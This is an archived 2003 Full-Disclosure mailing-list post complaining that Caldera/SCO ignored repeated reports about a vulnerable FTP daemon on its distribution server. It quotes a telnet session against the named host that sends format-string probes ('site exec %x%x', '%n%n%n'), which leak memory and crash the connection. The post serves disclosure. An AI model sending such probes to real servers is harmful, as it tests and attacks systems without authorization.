[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] SCO Web Site Vulnerable to Slapper?
- To: Jeremiah Cornelius <jeremiah@nur.net>
- Subject: Re: [Full-Disclosure] SCO Web Site Vulnerable to Slapper?
- From: KF <dotslash@snosoft.com>
- Date: Tue, 19 Aug 2003 16:20:45 +0000
**** CALERA ARE YOU PAYING ATTENTION **** WAKE UP ****
(normally I would not do this...) I am under the impression that either
they probably don't care about their secuirty or they are ignorant... I
reported this (see below) to them SEVERAL times... they use a vulnerable
version of their own ftpd on their ftp server... can you say trojaned
distribution site? They probably have not patched it because no one has
produced a public exploit... they DO have a patch available however.
> telnet ftpput.caldera.com 21
> Trying 216.250.128.33...
> Connected to ftpput.caldera.com.
> Escape character is '^]'.
> 220 artemis FTP server (Version 2.1WU(1)) ready.
> user anonymous
> 331 Guest login ok, send e-mail address as password.
> pass err@
> 230-Welcome to Caldera's FTP Archive Site
> 230-
...
> 230 Guest login ok, access restrictions apply.
> site exec %x%x
> 200-d2
> 200 (end of '%x%x')
> site exec %n%n%n
> Connection closed by foreign host.
-KF
-------------------------------------------------
subject: [Full-Disclosure] SCO Web Site Vulnerable to Slapper?
integerdotonefourfivenine@yahoo.com wrote:
They seem to be running Apache/1.3.14 (Unix)
mod_ssl/2.7.1 OpenSSL/0.9.6 PHP/4.3.2-RC on Linux,
which, if I have my facts straight, is vulnerable to
<URL:http://www.cert.org/advisories/CA-2002-27.html>.
Am I correct?
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html